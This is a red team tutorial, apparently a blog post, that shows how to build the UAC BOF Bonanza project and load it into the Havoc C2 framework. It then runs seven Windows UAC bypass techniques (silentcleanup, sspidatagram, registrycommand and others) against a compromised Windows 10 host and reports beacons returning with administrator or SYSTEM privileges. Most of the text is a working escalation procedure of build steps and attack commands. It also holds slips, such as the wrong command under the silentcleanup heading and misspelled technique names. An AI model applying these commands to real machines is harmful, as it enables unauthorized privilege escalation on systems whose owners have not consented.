Using Havoc C2 to bypass UAC

100 Days of Red Team

Note: This was first published on https://100daysofredteam.com as a series of posts.

For this demonstration, I will be using Matthew David’s UAC BOF Bonanza project. This project combines multiple UAC bypass techniques into a Beacon Object File (BOF) that can be used with Havoc C2. I will be demonstrating following techniques:

  • SilentCleanupWinDir — Modifies the “Environment\windir” registry key and executes the SilentCleanup scheduled task via schtasksrun by @TrustedSec.
  • RegistryShellCommand — Modifies the “ms-settings\Shell\Open\command" registry key and executes an auto-elevated EXE (ComputerDefaults.exe).
  • SspiUacBypass — Forges a token from a fake network authentication though SSPI Datagram Contexts. It will then impersonate the forged token and use CreateSvcRpc by @x86matthew to create a new SYSTEM service. Original research and code is from @splinter_code.
  • TrustedPathDLLHijack — Creates fake windows directory C:\Windows \, copies supplied DLL to location, and executes auto-elevated EXE (ComputerDefaults.exe).
  • CmstpElevatedCOM — Creates an elevated ICMLuaUtil COM object and calls its ShellExec function to execute the provided file on disk.
  • ColorDataProxy — Creates an elevated ICMLuaUtil COM object and calls its SetRegistryStringValue function to write the location of the provided file to the DisplayCalibrator registry value residing in HKLM. It will then create an elevated IColorDataProxy COM object and call its LaunchDccw function, resulting in the execution of the provided file.
  • EditionUpgradeManager — Modifies the “Environment\windir” registry key, creates a elevated IEditionUpgradeManager COM object, and then calls the AcquireModernLicenseWithPreviousId function from the elevated COM object to execute the provided file.

I am using Debian 12, Ubuntu 24.04, Havoc C2 0.7 and Windows 10 target for this demonstration. I am assuming that there’s already a beacon from a Windows 10 machine calling back to Havoc C2.

Note: I am using Debian 12 with mingw-w64 version 10 or higher (along with build-essentials) to compile the project as per Matthew’s recommendation.

Install build-essentials and mingw-w64 on Debian 12:

sudo apt install build-essential
sudo apt install mingw-w64

Clone the project using the following command:

git clone https://github.com/icyguider/UAC-BOF-Bonanza.git

Compile the project:

cd UAC-BOF-Bonanza
make
Successfully compiled the project on Debian 12

To load this in Havoc C2, go to Scripts → Script Manager → Load Script and select the Havoc-UACBypass.py file.

Loading the BOF in Havoc C2

I am assuming that there’s already a beacon from a Windows 10 machine calling back to Havoc C2.

Havoc C2 beacon running with standard privileges

To see available UAC bypass options, issue the following command:

help uac-bypass
UAC Bypass options in UAC Bypass Bonanza

UAC bypass via silentcleanup technique

To see the command format use

help uac-bypass silentcleanup
Help menu for silentcleanup UAC bypass technique

To use this technique, we need a locally stored EXE file that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2.

Let’s execute this technique:

uac-bypass trustedpath /home/rt/uac.exe
Executing silentcleanup UAC bypass technique
Received a beacon running with administrator privileges

UAC bypass via sspidatagram technique

To see the command format use

help uac-bypass sspidatagram
Help menu for sspidatagrap UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass sspidatagrap C:\Users\rt\Downloads\uac.exe
Executing sspidatagram UAC bypass technique
Received a beacon running with SYSTEM privileges

UAC bypass via registrycommand technique

To see the command format use

help uac-bypass registrycommand
Help menu for registrycommand UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass registrycommand C:\Users\rt\Downloads\uac.exe
Executing registrycommand UAC bypass technique
Received a beacon running with Administrator privileges

UAC bypass via trustedpath technique

To see the command format use

help uac-bypass trustedpath
Help menu for trustedpath UAC bypass technique

To use this technique, we need a locally stored DLL file that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2.

Let’s execute this technique:

uac-bypass trustedpath /home/rt/uac.dll
Executing trustedpath UAC bypass technique

Even though the execution was successful, I did not receive an elevated beacon. Maybe I need to use a different DLL.

UAC bypass via elevatedcom technique

To see the command format use

help uac-bypass elevatedcom
Help menu for elevatedcom UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass elevatedcom C:\Users\rt\Downloads\uac2.exe
Executing elevatedcom UAC bypass technique
Received a beacon running with Administrator privileges

UAC bypass via colordataproxy technique

To see the command format use

help uac-bypass colordataproxy
Help menu for colordateproxy UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass colordataproxy C:\Users\rt\Downloads\uac2.exe
Executing colordataproxy UAC bypass technique
Received a beacon running with Administrator privileges

UAC bypass via editionupgrade technique

To see the command format use

help uac-bypass editionupgrade
Help menu for editionupgrade UAC bypass technique

To use this technique, we need a locally stored EXE file that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2.

Let’s execute this technique:

uac-bypass editionupgrade /home/rt/uac2.exe
Executing editionupgrade UAC bypass technique
Received a beacon running with Administrator privileges

This technique is relatively more expensive due to following reasons:

  • The beacon used to execute this technique became unresponsive.
  • Even if you manage to land another beacon on the target machine, this technique cannot be reused without rebooting it.
editionupgrade technique failed to execute second time
Red Team Notes
- Matthew David’s UAC Bypass Bonanza can be used to bypass User Access Control on Windows machines and execute code with elevated privileges.
- Shout out to Matthew David (Icyguider) for helping me out with this.

Follow my journey of 100 Days of Red Team on WhatsApp, Telegram or Discord.

References

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

100 Days of Red Team
100 Days of Red Team

Written by 100 Days of Red Team

Learn red team concepts, tools, techniques and tradecraft with me, one day at a time.

No responses yet

Write a response